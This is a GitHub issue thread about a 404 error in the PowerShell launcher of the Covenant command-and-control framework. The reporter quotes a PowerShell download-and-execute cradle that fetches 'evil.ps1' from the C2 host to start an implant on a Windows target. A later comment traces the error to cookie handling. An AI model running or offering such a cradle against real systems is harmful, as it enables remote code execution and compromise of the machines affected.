### ISSUE TITLE
[Bug] PowerShell Launcher 404 Not Found 

### ISSUE THREAD

**Issue by Nervanas** [cobbr/Covenant#273] opened 2020-12-06 19:21 UTC
**How to reproduce the problem:**
It's basically just a default Listener with a default PowerShell Launcher. Steps taken:

`Listener > Create > (Edit connect address) > Click on "Create"`
`Launcher > PowerShell > Select Listener from previous Step > Click on "Host" Tab > Select URL name i. e. "evil.ps1" > Click on "Host"`

Now within a PowerShell session on the target load and execute the previously created Launcher:
`iex (New-Object Net.WebClient).DownloadString('http://<IP-Covenant-Host>/evil.ps1')`

![Executing Launcher Error](https://user-images.githubusercontent.com/31802265/101289690-5e679680-37fe-11eb-9d3f-9b8122ce2b0e.png)

Even though code is accessible by visiting the URI through a browser i. e. Edge:

![Launcher Code is accessible](https://user-images.githubusercontent.com/31802265/101289715-83f4a000-37fe-11eb-8cb0-6ef688f2036e.png)

**Describe the feature request or bug**
Usually the Launcher code should work without the 404 error, since the Launcher code is indeed accessible. (see Screenshot from above)

**Expected behavior**
Executing the Launcher code to get a Grunt within Covenant.

**Covenant Server Information:**
 - OS: Kali linux
 - Docker

**Target Information (System that implant is running on):**
 - OS: Microsoft Windows 10 Pro
 - Version 10.0.18362 N/A Build 18362

**Comment by cobbr** [comment] 2021-01-06 22:47
I'm unable to reproduce this issue. Are you sure this isn't a routing issue?

**Comment by cobbr** [comment] 2021-02-12 23:45
Seems like this must be a routing issue. Closing for now, if I get a response would be happy to re-open.

**Closed by cobbr** 2021-02-12 23:45 UTC
Labels: cant-reproduce, question

**Comment by Sanduuz** [comment] 2025-10-24 17:58
I encountered similar behavior. It would return 200 OK when making a HTTP GET request but a 404 Not Found when making a POST request. Checking the returned 404 request more in depth showed that there was error "Format not compatible with value." This is thrown from `Covenant/Covenant/Core/Utilities.cs` when `TryParseExact` fails (returns false).

I did not check the root cause of the error more in depth, but what seemed to fix the problem was to NOT remove the ASPSESSIONID cookie that is part of the default HTTP profile.

Hopefully this helps a bit!
